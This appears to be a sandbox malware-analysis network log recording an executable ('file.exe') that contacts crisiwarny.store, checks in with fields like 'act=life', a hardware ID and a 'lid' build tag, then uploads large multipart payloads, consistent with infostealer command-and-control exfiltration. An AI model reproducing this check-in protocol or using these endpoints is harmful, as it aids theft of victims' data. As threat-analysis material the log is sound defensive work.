                                                                                        Oct 27, 2024 21:06:26.538049936 CET44349716104.21.95.91192.168.2.5
                                                                                        Oct 27, 2024 21:06:26.538206100 CET49716443192.168.2.5104.21.95.91
                                                                                        Oct 27, 2024 21:06:26.538233995 CET44349716104.21.95.91192.168.2.5
                                                                                        Oct 27, 2024 21:06:26.538256884 CET49716443192.168.2.5104.21.95.91
                                                                                        Oct 27, 2024 21:06:26.538392067 CET49716443192.168.2.5104.21.95.91
                                                                                        Oct 27, 2024 21:06:26.538430929 CET49716443192.168.2.5104.21.95.91
                                                                                        Oct 27, 2024 21:06:26.548569918 CET44349716104.21.95.91192.168.2.5
                                                                                        Oct 27, 2024 21:06:26.548755884 CET49716443192.168.2.5104.21.95.91
                                                                                        Oct 27, 2024 21:06:26.548779011 CET44349716104.21.95.91192.168.2.5
                                                                                        Oct 27, 2024 21:06:26.548801899 CET49716443192.168.2.5104.21.95.91
                                                                                        Oct 27, 2024 21:06:26.548818111 CET44349716104.21.95.91192.168.2.5
                                                                                        Oct 27, 2024 21:06:26.548835039 CET49716443192.168.2.5104.21.95.91
                                                                                        Oct 27, 2024 21:06:26.548851013 CET44349716104.21.95.91192.168.2.5
                                                                                        Oct 27, 2024 21:06:26.548863888 CET49716443192.168.2.5104.21.95.91
                                                                                        Oct 27, 2024 21:06:26.553730011 CET44349716104.21.95.91192.168.2.5
                                                                                        Oct 27, 2024 21:06:28.350918055 CET44349716104.21.95.91192.168.2.5
                                                                                        Oct 27, 2024 21:06:28.351191044 CET44349716104.21.95.91192.168.2.5
                                                                                        Oct 27, 2024 21:06:28.351202011 CET49716443192.168.2.5104.21.95.91
                                                                                        Oct 27, 2024 21:06:28.351371050 CET49716443192.168.2.5104.21.95.91
                                                                                        Oct 27, 2024 21:06:28.392110109 CET49733443192.168.2.5104.21.95.91
                                                                                        Oct 27, 2024 21:06:28.392159939 CET44349733104.21.95.91192.168.2.5
                                                                                        Oct 27, 2024 21:06:28.392326117 CET49733443192.168.2.5104.21.95.91
                                                                                        Oct 27, 2024 21:06:28.392611027 CET49733443192.168.2.5104.21.95.91
                                                                                        Oct 27, 2024 21:06:28.392627001 CET44349733104.21.95.91192.168.2.5
                                                                                        Oct 27, 2024 21:06:29.038846970 CET44349733104.21.95.91192.168.2.5
                                                                                        Oct 27, 2024 21:06:29.038933039 CET49733443192.168.2.5104.21.95.91
                                                                                        Oct 27, 2024 21:06:29.039691925 CET49733443192.168.2.5104.21.95.91
                                                                                        Oct 27, 2024 21:06:29.039736986 CET44349733104.21.95.91192.168.2.5
                                                                                        Oct 27, 2024 21:06:29.039889097 CET44349733104.21.95.91192.168.2.5
                                                                                        Oct 27, 2024 21:06:29.039951086 CET49733443192.168.2.5104.21.95.91
                                                                                        Oct 27, 2024 21:06:29.039969921 CET49733443192.168.2.5104.21.95.91
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 27, 2024 21:06:17.074382067 CET | 64096 | 53 | 192.168.2.5 | 1.1.1.1
Oct 27, 2024 21:06:17.084762096 CET | 53 | 64096 | 1.1.1.1 | 192.168.2.5
Oct 27, 2024 21:06:17.099704981 CET | 61307 | 53 | 192.168.2.5 | 1.1.1.1
Oct 27, 2024 21:06:17.123224020 CET | 53 | 61307 | 1.1.1.1 | 192.168.2.5

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 27, 2024 21:06:17.074382067 CET | 192.168.2.5 | 1.1.1.1 | 0x9342 | Standard query (0) | presticitpo.store | A (IP address) | IN (0x0001) | false
Oct 27, 2024 21:06:17.099704981 CET | 192.168.2.5 | 1.1.1.1 | 0x7333 | Standard query (0) | crisiwarny.store | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 27, 2024 21:06:17.084762096 CET | 1.1.1.1 | 192.168.2.5 | 0x9342 | Name error (3) | presticitpo.store | none | none | A (IP address) | IN (0x0001) | false
Oct 27, 2024 21:06:17.123224020 CET | 1.1.1.1 | 192.168.2.5 | 0x7333 | No error (0) | crisiwarny.store | | 104.21.95.91 | A (IP address) | IN (0x0001) | false
Oct 27, 2024 21:06:17.123224020 CET | 1.1.1.1 | 192.168.2.5 | 0x7333 | No error (0) | crisiwarny.store | | 172.67.170.64 | A (IP address) | IN (0x0001) | false

• crisiwarny.store

Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49704 | 104.21.95.91 | 443 | 5536 | C:\Users\user\Desktop\file.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-27 20:06:17 UTC | 263 | OUT | POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 8
    Host: crisiwarny.store
2024-10-27 20:06:17 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
    Data Ascii: act=life
2024-10-27 20:06:18 UTC | 1009 | IN | HTTP/1.1 200 OK
    Date: Sun, 27 Oct 2024 20:06:18 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: PHPSESSID=49pgrmjcs8jucopoobuebd44ue; expires=Thu, 20 Feb 2025 13:52:57 GMT; Max-Age=9999999; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    cf-cache-status: DYNAMIC
    vary: accept-encoding
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YJ%2B9jn%2FiCYB4gEmp6eBjdENblnXVOny96frie6fUsrAqhirebXTKzyw%2FxV1zMvusoe539PRGzaLOncZbK%2FHIWEK3U28EUj8xhG562gIQY9hKYDT5ViyhhaKYYWO8XASbEEqC"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8d954e49caf928ab-DFW
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1226&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2838&recv_bytes=907&delivery_rate=2571936&cwnd=251&unsent_bytes=0&cid=04b628d3d1863dae&ts=570&x=0"
                                                                                        2024-10-27 20:06:18 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                        Data Ascii: 2ok
                                                                                        2024-10-27 20:06:18 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 49705 | 104.21.95.91 | 443 | 5536 | C:\Users\user\Desktop\file.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-27 20:06:18 UTC | 264 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 52
Host: crisiwarny.store
2024-10-27 20:06:18 UTC | 52 | OUT | Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e 64 61 72 79 79 26 6a 3d
Data Ascii: act=recive_message&ver=4.0&lid=4SD0y4--legendaryy&j=
2024-10-27 20:06:19 UTC | 1005 | IN | HTTP/1.1 200 OK
Date: Sun, 27 Oct 2024 20:06:19 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=239mv9pe025t3cddp7vspmr0oe; expires=Thu, 20 Feb 2025 13:52:58 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5MZP8gqPsIZbftSuySPEBSAq83nkM8ib6l0QDkHEM6ys0ux6XtRjEvWvHWVpQNDrk9q39eMeLVMyKOajEP1yYZk6uuLKCT1x0SLlDnKTdAy7ogPBxFCl%2B6Ir3qHXHoM%2FHjDK"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8d954e512b822cda-DFW
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1396&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2838&recv_bytes=952&delivery_rate=2172543&cwnd=251&unsent_bytes=0&cid=de80c75cd29b734b&ts=547&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.5 | 49706 | 104.21.95.91 | 443 | 5536 | C:\Users\user\Desktop\file.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-27 20:06:20 UTC | 282 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 12840
Host: crisiwarny.store
2024-10-27 20:06:20 UTC | 12840 | OUT | Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 32 46 46 43 34 34 42 38 42 36 42 30 34 37 30 42 43 39 44 33 43 34 33 45 44 43 34 44 30 32 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e
Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"D2FFC44B8B6B0470BC9D3C43EDC4D022--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"4SD0y4--legen
2024-10-27 20:06:20 UTC | 1011 | IN | HTTP/1.1 200 OK
Date: Sun, 27 Oct 2024 20:06:20 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=ndro82gmu75a0vuc0498s2jimi; expires=Thu, 20 Feb 2025 13:52:59 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nKrBX%2FuZLPe3izjG%2FGc7hdzLkGCdjikSSntsE4Cz82Q3%2BUjgQ5lOymEp7GdZjhX8ls2FiSmj5WVIymVXtsbt3Mi0Q6ygdwUTYRYKb0geqS8TdLAwQ9bLCWmGbPDNvXgTTbXu"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8d954e59fc09e7e7-DFW
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1192&sent=10&recv=18&lost=0&retrans=0&sent_bytes=2838&recv_bytes=13780&delivery_rate=2219157&cwnd=251&unsent_bytes=0&cid=9ff0cf2589d3b4b1&ts=428&x=0"
2024-10-27 20:06:20 UTC | 23 | IN | Data Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 30 0d 0a
Data Ascii: 11ok 173.254.250.90
2024-10-27 20:06:20 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.5 | 49707 | 104.21.95.91 | 443 | 5536 | C:\Users\user\Desktop\file.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-27 20:06:21 UTC | 282 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 15082
Host: crisiwarny.store
2024-10-27 20:06:21 UTC | 15082 | OUT | Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 32 46 46 43 34 34 42 38 42 36 42 30 34 37 30 42 43 39 44 33 43 34 33 45 44 43 34 44 30 32 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e
Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"D2FFC44B8B6B0470BC9D3C43EDC4D022--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"4SD0y4--legen
2024-10-27 20:06:22 UTC | 1008 | IN | HTTP/1.1 200 OK
Date: Sun, 27 Oct 2024 20:06:22 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=oi66c0b2j2uhs1914eevnb7jha; expires=Thu, 20 Feb 2025 13:53:00 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=33jc3lQtZQvA7lSodtCRP3hgOVMMuNhORlGrkvapDBQr%2BMMeEcMxc81e8nNAvamlwggMnV3LvBVM9ivRDt6XtlcO0ERRrWF%2BvkjkaURX4FQSO2wc59aZkSUHVvQJKHBKr7fG"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8d954e618aa16b77-DFW
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1073&sent=9&recv=19&lost=0&retrans=0&sent_bytes=2838&recv_bytes=16022&delivery_rate=2538124&cwnd=250&unsent_bytes=0&cid=f8b87b92b056058a&ts=572&x=0"
2024-10-27 20:06:22 UTC | 23 | IN | Data Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 30 0d 0a
Data Ascii: 11ok 173.254.250.90
2024-10-27 20:06:22 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.5 | 49708 | 104.21.95.91 | 443 | 5536 | C:\Users\user\Desktop\file.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-27 20:06:23 UTC | 282 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 20572
Host: crisiwarny.store
2024-10-27 20:06:23 UTC | 15331 | OUT | Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 32 46 46 43 34 34 42 38 42 36 42 30 34 37 30 42 43 39 44 33 43 34 33 45 44 43 34 44 30 32 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e
Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"D2FFC44B8B6B0470BC9D3C43EDC4D022--be85de5ipdocierre1Content-Disposition: form-data; name="pid"3--be85de5ipdocierre1Content-Disposition: form-data; name="lid"4SD0y4--legen
2024-10-27 20:06:23 UTC | 5241 | OUT | Data Raw: 5a 3e 93 af 35 13 92 cd 36 8a 95 d9 76 89 c4 4d c9 4d d9 5a b5 da 68 27 0c 46 c7 33 b7 ee 57 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 75 6e 20 0a e6 d6 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 ce 0d 46 c1 dc ba 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 b9 81 28 98 5b f7 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3a 37 18 05 73 eb 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 e7 06 a2 60 6e dd 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Data Ascii: Z>56vMMZh'F3Wun 4F([:7s~X`nO
2024-10-27 20:06:23 UTC | 1009 | IN | HTTP/1.1 200 OK
Date: Sun, 27 Oct 2024 20:06:23 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=jjpqej1lhet9ucfc3gi9o3thas; expires=Thu, 20 Feb 2025 13:53:02 GMT; Max-Age=9999999; path=/
                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        cf-cache-status: DYNAMIC
                                                                                        vary: accept-encoding
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=I%2FPaJV5xWO0YV2LqUZJLwVaPxoX9fcWVYoAHLgL%2BiJzjcv4TNoNM2FdGrsPqjqi7gC3r6DASoSWVI3ApFStg4MM1h1sAzapGLjmWaa3xYm9TADPuFDQjGdG0ZFWjDhcf4dgd"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8d954e6a8f654754-DFW
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1186&sent=12&recv=26&lost=0&retrans=0&sent_bytes=2838&recv_bytes=21534&delivery_rate=2427493&cwnd=247&unsent_bytes=0&cid=5f381d5df3f794d4&ts=709&x=0"
                                                                                        2024-10-27 20:06:23 UTC23INData Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 30 0d 0a
                                                                                        Data Ascii: 11ok 173.254.250.90
                                                                                        2024-10-27 20:06:23 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


Session ID:5
Source IP:192.168.2.5
Source Port:49710
Destination IP:104.21.95.91
Destination Port:443
PID:5536
Process:C:\Users\user\Desktop\file.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-27 20:06:24 UTC | 281 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 1258
Host: crisiwarny.store
2024-10-27 20:06:24 UTC | 1258 | OUT | Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 32 46 46 43 34 34 42 38 42 36 42 30 34 37 30 42 43 39 44 33 43 34 33 45 44 43 34 44 30 32 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e
Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"D2FFC44B8B6B0470BC9D3C43EDC4D022--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"4SD0y4--legen
2024-10-27 20:06:25 UTC | 1008 | IN | HTTP/1.1 200 OK
Date: Sun, 27 Oct 2024 20:06:25 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=c9bfkrucr26pu88mqkedg7k0j1; expires=Thu, 20 Feb 2025 13:53:04 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zIy0wj1T7%2FpH85B%2BWtgLlLaHd2pApdLqYWedanMhd0m7To6B78BNzV4Eno18bmAOjrKl5rFg0y%2FYJvnxl9R6ex5I4MdOiRHlndFx0gBzy2azogmMlXFloEOQo90JQlGUUHwZ"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8d954e74bb5f3467-DFW
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1362&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2838&recv_bytes=2175&delivery_rate=2193939&cwnd=249&unsent_bytes=0&cid=7a3a935cacc0143e&ts=550&x=0"
2024-10-27 20:06:25 UTC | 23 | IN | Data Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 30 0d 0a
Data Ascii: 11ok 173.254.250.90
2024-10-27 20:06:25 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID:6
Source IP:192.168.2.5
Source Port:49716
Destination IP:104.21.95.91
Destination Port:443
PID:5536
Process:C:\Users\user\Desktop\file.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-27 20:06:26 UTC | 283 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 569007
Host: crisiwarny.store
2024-10-27 20:06:26 UTC | 15331 | OUT | Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 32 46 46 43 34 34 42 38 42 36 42 30 34 37 30 42 43 39 44 33 43 34 33 45 44 43 34 44 30 32 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e
Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"D2FFC44B8B6B0470BC9D3C43EDC4D022--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"4SD0y4--legen
2024-10-27 20:06:26 UTC | 15331 | OUT | Data Raw: cb 37 c4 c5 91 4b 85 9c ba c2 10 a9 b9 60 76 06 d2 7e 80 d7 ca ed b5 c6 ad 4b 71 5f f8 ce 04 98 3f 52 4c 94 dd fa 29 4b 7e ea 2b 7b 6d c7 e3 c2 2d ad be b0 57 fe 02 bf 75 25 93 7a be 09 a3 0c cd 47 6b 08 8b a5 52 e3 b2 12 25 e9 56 ae d0 c5 34 c9 84 b5 ec 85 f1 79 21 0d a7 96 a5 8e 5a 91 1c e5 29 7d 21 ca fd 7a 58 42 52 72 3b 53 39 06 16 4a f6 65 1a de 38 21 0d 26 e4 60 fd 70 7a a6 e0 5a 19 1f ec b3 55 e9 e5 e0 c7 6b 1d 54 04 df b0 6b 1a f6 f0 37 3e ae 1c 32 d6 8e 0a ae 05 90 d0 5d ba f0 d6 aa 89 24 7a 0e bb f6 3d 6f dd ad 45 89 b5 9b 1f ac 5e 58 d3 e8 85 68 79 b2 37 60 db ea a2 62 be 03 c1 8d 02 e3 27 17 0e bc eb d2 04 15 63 a9 0f 5f 7f 59 3f e6 f4 c0 9e eb 67 f3 da 3f 1b 62 cf f5 5c 98 7d f6 fe 02 92 40 c7 ff ac 81 bc 6f ba 0d ec 1a af aa aa 41 31 1d 9b
Data Ascii: 7K`v~Kq_?RL)K~+{m-Wu%zGkR%V4y!Z)}!zXBRr;S9Je8!&`pzZUkTk7>2]$z=oE^Xhy7`b'c_Y?g?b\}@oA1
